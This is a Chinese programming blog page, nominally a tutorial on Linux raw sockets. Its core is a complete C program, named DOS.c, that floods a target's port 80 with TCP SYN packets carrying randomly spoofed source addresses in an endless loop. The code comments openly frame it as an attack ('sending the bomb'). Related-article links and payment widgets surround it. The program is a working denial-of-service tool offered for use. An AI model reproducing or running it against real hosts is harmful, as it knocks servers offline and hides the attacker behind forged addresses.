Linux网络编程: 原始套接字

最新推荐文章于 2025-04-24 21:33:19 发布
最新推荐文章于 2025-04-24 21:33:19 发布
阅读量1k 收藏
点赞数
本文提供了一段使用原始套接字发送炸弹攻击的C/C++代码示例,展示了如何绕过TCP和UDP套接字限制,直接向目标主机发送大量数据包,以达到拒绝服务攻击的目的。请注意,这种行为可能违反法律法规。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原始套接字(SOCK_RAW). 应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能. 

注意原始套接字只能够由有 root权限的人创建. 

[1].[代码] [C/C++]代码 跳至 [1]

view source
print ?
001 /********************  DOS.c               *****************/
002 #include <stdlib.h>
003 #include <stdio.h>
004 #include <errno.h>
005 #include <string.h>
006 #include <unistd.h>
007 #include <netdb.h>
008 #include <sys/socket.h>
009 #include <netinet/in.h>
010 #include <sys/types.h>
011 #include <arpa/inet.h>
012  
013 #define DESTPORT        80       /* 要攻击的端口(WEB)      */
014 #define LOCALPORT       8888
015  
016 void send_tcp(int sockfd,struct sockaddr_in *addr);
017 unsigned short check_sum(unsigned short *addr,int len);
018  
019 int main(int argc,char **argv)
020 {
021 int sockfd;
022 struct sockaddr_in addr;
023 struct hostent *host;
024 int on=1;
025  
026 if(argc!=2)
027 {
028         fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
029         exit(1);
030 }
031  
032 bzero(&addr,sizeof(struct sockaddr_in));
033 addr.sin_family=AF_INET;
034 addr.sin_port=htons(DESTPORT);
035  
036 if(inet_aton(argv[1],&addr.sin_addr)==0)
037 {
038         host=gethostbyname(argv[1]);
039         if(host==NULL)
040         {
041                 fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
042                 exit(1);
043         }
044         addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
045 }
046  
047 /**** 使用IPPROTO_TCP创建一个TCP的原始套接字    ****/
048  
049 sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
050 if(sockfd<0)
051 {
052         fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
053         exit(1);
054 }
055 /********  设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写  ***/
056  
057 setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
058  
059 /****  没有办法,只用超级护用户才可以使用原始套接字    *********/
060 setuid(getpid());
061  
062 /*********  发送炸弹了!!!!          ****/
063 send_tcp(sockfd,&addr);
064 }
065  
066   
067  
068 /*******  发送炸弹的实现   *********/
069 void send_tcp(int sockfd,struct sockaddr_in *addr)
070 {
071 char buffer[100];  /**** 用来放置我们的数据包  ****/
072 struct ip *ip;
073 struct tcphdr *tcp;
074 int head_len;
075  
076 /******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度  ***/
077  
078 head_len=sizeof(struct ip)+sizeof(struct tcphdr);
079  
080 bzero(buffer,100);
081  
082 /********  填充IP数据包的头部,还记得IP的头格式吗?     ******/
083 ip=(struct ip *)buffer;
084 ip->ip_v=IPVERSION;             /** 版本一般的是 4      **/
085 ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度  **/
086 ip->ip_tos=0;                   /** 服务类型            **/
087 ip->ip_len=htons(head_len);     /** IP数据包的长度      **/
088 ip->ip_id=0;                    /** 让系统去填写吧      **/
089 ip->ip_off=0;                   /** 和上面一样,省点时间 **/       
090 ip->ip_ttl=MAXTTL;              /** 最长的时间   255    **/
091 ip->ip_p=IPPROTO_TCP;           /** 我们要发的是 TCP包  **/
092 ip->ip_sum=0;                   /** 校验和让系统去做    **/
093 ip->ip_dst=addr->sin_addr;      /** 我们攻击的对象      **/
094  
095 /*******  开始填写TCP数据包                           *****/
096 tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
097 tcp->source=htons(LOCALPORT);
098 tcp->dest=addr->sin_port;           /** 目的端口    **/
099 tcp->seq=random();
100 tcp->ack_seq=0;
101 tcp->doff=5;
102 tcp->syn=1;                        /** 我要建立连接 **/
103 tcp->check=0;
104  
105  
106 /** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^  **/
107 while(1)
108   {
109 /**  你不知道我是从那里来的,慢慢的去等吧!      **/
110     ip->ip_src.s_addr=random();    
111  
112 /** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */
113 /**            下面这条可有可无    */
114     tcp->check=check_sum((unsigned short *)tcp,
115                 sizeof(struct tcphdr));
116     sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
117   }
118 }
119  
120 /* 下面是首部校验和的算法,偷了别人的 */
121 unsigned short check_sum(unsigned short *addr,int len)
122 {
123 register int nleft=len;
124 register int sum=0;
125 register short *w=addr;
126   short answer=0;
127  
128 while(nleft>1)
129 {
130   sum+=*w++;
131   nleft-=2;
132 }
133 if(nleft==1)
134 {
135   *(unsigned char *)(&answer)=*(unsigned char *)w;
136   sum+=answer;
137 }
138    
139 sum=(sum>>16)+(sum&0xffff);
140 sum+=(sum>>16);
141 answer=~sum;
142 return(answer);
143 }

gold0523
关注
linux 原始套接字 编程
09-01
linux 原始套接字 编程
原始套接字实现Ping命令和Tracert命令
02-19
采用C++语言,基于原始套接字实现了Ping和Tracert命令。发送主机通过ping程序给目标主机发送ICMP的回声请求报文,并根据收到的ICMP回声应答报文来确定网络的连通性。Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据包访问目标所采取的路径。Tracert 命令是用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机经过的每个路由器及每个跃点的往返时间 (RTT) 的命令行报告输出。
Linux网络编程——原始套接字编程
热门推荐
秋叶原 && Mike || 麦克
03-27 5万+
原始套接字编程和之前的 UDP 编程差不多,无非就是创建一个套接字后,通过这个套接字接收数据或者发送数据。区别在于,原始套接字可以自行组装数据包(伪装本地 IP,本地 MAC),可以接收本机网卡上所有的数据帧(数据包)。另外,必须在管理员权限下才能使用原始套接字原始套接字的创建int socket ( int family, int type, int protocol );参数:family:...
Linux操作系统网络编程--原始套接字 (1)
KZM2008的专栏
03-10 965
Linux操作系统网络编程--原始套接字 (1)http://soft.zdnet.com.cn/software_zone/2007/1020/568223.shtml 我们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章 里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW)。应用原始套接字,我们可以编写出由TCP和UDP
Linux网络编程原始套接字简介
遇见你是我最美丽的意外
12-15 4477
Linux网络编程原始套接字编程 一、原始套接字用途 通常情况下程序员接所接触到的套接字(Socket)为两类: 流式套接字(SOCK_STREAM):一种面向连接的Socket,针对于面向连接的TCP 服务应用; 数据报式套接字(SOCK_DGRAM):一种无连接的Socket,对应于无连接的UDP 服务应用。 从用户的角度来看,SOCK_STREAM、SOCK_DGRAM 这两类套...
Linux网络编程原始套接字编程及实例分析
ZCL的专栏
11-30 850
Linux网络编程原始套接字编程及实例分析 转载 2016年07月29日 11:25:11 标签: socket / 网络编程 / 编程 / linux / 888 编辑 删除 Linux网络编程原始套接字编程及实例分析 一、原始套接字能干什么? 通常情况下程序员接所接触到的套接字(Socket)为两类: 流式套接字(SOCK_
Linux网络编程 深入Linux网络栈:原始套接字链路层实战解析
2401_87244387的博客
04-24 1445
原始套接字、链路层编程、协议分析、MAC帧、IP报文、TCP/UDP解包、网络实战
Linux网络编程原始套接字--包过滤器BPF
jin787730090的博客
06-17 3999
目录参考文章一、BPF介绍二、BPF的结构三、BPF Socket 实例三、BPF Code 生成方法 参考文章 linux网络和BPF linux 下的 包过滤器 BPF Linux bpf 3.1、Berkeley Packet Filter (BPF) (Kernel Document) 一、BPF介绍 BPF(Berkeley Packet Filter)伯克利包过滤器。 BPF允许用户空间程序将一个过滤(filter)附加到任何的套接字(socket)上面用来允许或不允许某些类型的数据通过
Linux网络编程原始套接字 SOCK_RAW, IPV6 rawsocket
dolphin98629的专栏
06-04 2628
https://stackoverflow.com/questions/31419727/how-to-send-modified-ipv6-packet-through-raw-socket 比较新的内核才支持 1 2 3 4 5 6 7 socket(fd, SOCK_RAW, IPPROTO_UDP); // 指定 TCP/UDP/ICMP int val = 1; ret = setsockopt(test->state.sockfd, IPPROTO
Linux网络编程原始套接字编程及实例分析.docx
06-26
### Linux网络编程原始套接字编程及实例分析 #### 一、原始套接字的功能与应用场景 在探讨原始套接字(SOCK_RAW)之前,我们先回顾一下常见的两种套接字类型:流式套接字(SOCK_STREAM)和数据报式套接字(SOCK_...
linux网络编程原始套接字的魔力[上]
11-06
### Linux网络编程原始套接字的魔力 #### 原始套接字简介 在Linux网络编程中,原始套接字(Raw Sockets)是一种特殊的套接字类型,它允许用户空间程序直接访问底层协议,从而可以构建自定义的数据包。与普通的...
linux网络编程原始套接字的魔力[下]
11-06
为了实现直接从链路层收发数据帧的功能,我们需要使用以下形式的原始套接字: ```c socket(PF_PACKET, type, protocol); ``` - **PF_PACKET**:表示我们将使用原始套接字来与链路层进行通信。 - **type**:可以...
Linux网络编程原始套接字编程及实例分析(一)
u012125696的专栏
06-01 657
原文出处:http://network.51cto.com/art/201503/470400.htm 如有侵权,请及时告知,将第一时间处理! ===============================================================================================================================
Linux网络编程原始套接字编程(下)
loy的专栏
09-13 1178
可以接收链路层MAC帧的原始套接字        前面我们介绍过了通过原始套接字socket(AF_INET, SOCK_RAW, protocol)我们可以直接实现自行构造整个IP报文,然后对其收发。提醒一点,在用这种方式构造原始IP报文时,第三个参数protocol不能用IPPROTO_IP,这样会让系统疑惑,不知道该用什么协议来伺候你了。        今天我们介绍原始套接字的另一种用法
mmexport1755325166750.mp4
08-16
mmexport1755325166750.mp4
Go语言教程&案例&相关项目资源
08-16
Go语言教程&案例&相关项目资源
基于应力的多轴疲劳分析应用程序.zip
最新发布
08-16
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Linux网络编程:探索原始套接字的使用
原始套接字Linux网络编程中扮演着特殊的角色,它为开发者提供了一种直接与网络协议栈交互的途径。不同于普通的TCP或UDP套接字,原始套接字允许程序员完全控制数据包的头部信息,包括TCP、UDP以及IP头的各个字段。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值